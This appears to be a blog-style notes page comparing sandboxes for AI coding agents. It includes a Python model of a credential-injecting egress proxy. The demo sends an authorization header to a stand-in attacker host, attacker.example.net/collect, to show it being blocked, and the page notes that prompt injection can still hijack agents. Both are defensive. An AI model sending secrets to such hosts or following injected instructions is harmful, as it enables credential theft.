Coding Sandboxes

Updated 2026-02-09

Sandboxed environments are all the rage for running untrusted code generated by coding agents. This matters when you are giving agents access to tools, APIs, and secrets and clearly do not want them being able to exfiltrate credentials or escape isolation.

Note that as of writing, there is still no solution that prevents the Lethal Trifecta. Sandboxes, and even their mechanisms for hiding or masking your API keys and allowlisting egress URLs, are good first steps, but there is still no mitigation for prompt injection from those allowed sites that gets the agent to perform malicious actions with the access it does have.

So below is a quick (and incomplete) summary of some sandboxing tools.

Deno Sandbox

See Simon's post on it

In Deno Sandbox, secrets never enter the environment. Code sees only a placeholder.

This is huge. Secrets are handled via an explicit permission model — code never sees the real value, only a proxy. This was my biggest fear about other sandbox tools.

You can use Python too. You don't even need to be using Deno or JS.

Source: https://deno.com/blog/introducing-deno-sandbox#secrets-that-cant-be-stolen

Fly Sprites

Lightweight stateful Linux VMs built on Firecracker. Designed specifically for AI coding agents and untrusted code execution.

  • Start in 1-12s, can checkpoint/restore to roll back to clean state
  • Firecracker VM isolation — even exploited code can't escape to host
  • Isolated L3 networks, no direct inbound connections

Fly has Tokenizer for secret management — an HTTP proxy that injects encrypted credentials into API calls without exposing them to the sandbox. Secrets are encrypted client-side using Tokenizer's public key, then decrypted and injected upstream. The sandbox never sees the raw secret. Similar philosophy to Deno's approach but at the network layer.

Source: https://fly.io/blog/code-and-let-live/
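As an added example (not code from Deno, Fly, or Simon's post), here is a small Python model of the proxy-based secret pattern that both the Deno Sandbox section and Fly's Tokenizer describe: the real key lives only in the proxy, the sandboxed code is handed a placeholder, and the proxy swaps the placeholder for the real value only on requests bound for an allowlisted host. Everything in it is constructed for illustration: the `sandbox-secret:` placeholder format, the `EgressProxy` class, the host names, and the key values; neither product's real wire format or API is used.

```python
"""Constructed model of a credential-injecting egress proxy (not Deno's or Fly's code)."""
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed placeholder format: what sandboxed code sees instead of the secret.
PLACEHOLDER_PREFIX = "sandbox-secret:"


@dataclass
class EgressProxy:
    """Holds real secrets outside the sandbox and rewrites outbound requests."""

    secrets: dict[str, str]          # name -> real value; never handed to the sandbox
    allowed_hosts: frozenset[str]    # egress allowlist, checked before any substitution
    log: list[str] = field(default_factory=list)

    def placeholder_for(self, name: str) -> str:
        """Return the opaque token the sandbox gets in place of the real secret."""
        if name not in self.secrets:
            raise KeyError(f"unknown secret {name!r}")
        return f"{PLACEHOLDER_PREFIX}{name}"

    def forward(self, url: str, headers: dict[str, str]) -> dict:
        """Model of the proxy hop: enforce the allowlist, then inject real values.

        The allowlist check runs first on purpose: substituting the secret before
        deciding whether the host is allowed would leak it to any destination.
        """
        host = urlparse(url).hostname or ""
        if host not in self.allowed_hosts:
            self.log.append(f"DENY {host}")
            return {"status": 403, "error": "egress host not allowlisted"}
        upstream_headers = {k: self._substitute(v) for k, v in headers.items()}
        self.log.append(f"ALLOW {host}")
        # In a real deployment the request would now go upstream with the real key.
        return {"status": 200, "upstream_headers": upstream_headers}

    def _substitute(self, value: str) -> str:
        """Replace every placeholder token in a header value with the real secret."""
        out = value
        for name, real in self.secrets.items():
            out = out.replace(f"{PLACEHOLDER_PREFIX}{name}", real)
        return out


def run_demo() -> dict:
    """Drive the model with constructed values and return what the sandbox observed."""
    proxy = EgressProxy(
        secrets={"API_KEY": "real-key-CONSTRUCTED"},
        allowed_hosts=frozenset({"api.example.com"}),
    )
    # This is all the untrusted code ever holds; it never equals the real key.
    placeholder = proxy.placeholder_for("API_KEY")
    auth = {"Authorization": f"Bearer {placeholder}"}
    # Allowed host: the placeholder is exchanged for the real value on the way out.
    allowed = proxy.forward("https://api.example.com/v1/items", auth)
    # Non-allowlisted host: refused before any substitution, so nothing leaks.
    blocked = proxy.forward("https://attacker.example.net/collect", auth)
    return {
        "placeholder": placeholder,
        "allowed": allowed,
        "blocked": blocked,
        "log": list(proxy.log),
    }


if __name__ == "__main__":
    print(run_demo())
```

The design point the model makes visible is that the allowlist decision must precede substitution, or the proxy itself becomes the exfiltration path. It also shows the gap the note at the top of this page describes: the proxy cannot tell a legitimate request to `api.example.com` from one that a prompt injection talked the agent into making, so an allowlisted host still receives the real credential either way.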

Modal Sandboxes

Isolated containers for running untrusted code. Built on gVisor (Google's user-space kernel).

  • Sub-second cold starts, autoscale to 50k+ sandboxes
  • Secure-by-default: no inbound connections, no Modal resource access without explicit grants
  • Network controls: block_network=True or fine-grained CIDR allowlists
  • single_use_containers=True prevents info leakage between executions

No Deno- or Tokenizer-style proxy: secrets are injected as ordinary environment variables and read via os.environ. Once the code is running in the container, it can read the secrets directly.

Source: https://modal.com/docs/guide/sandboxes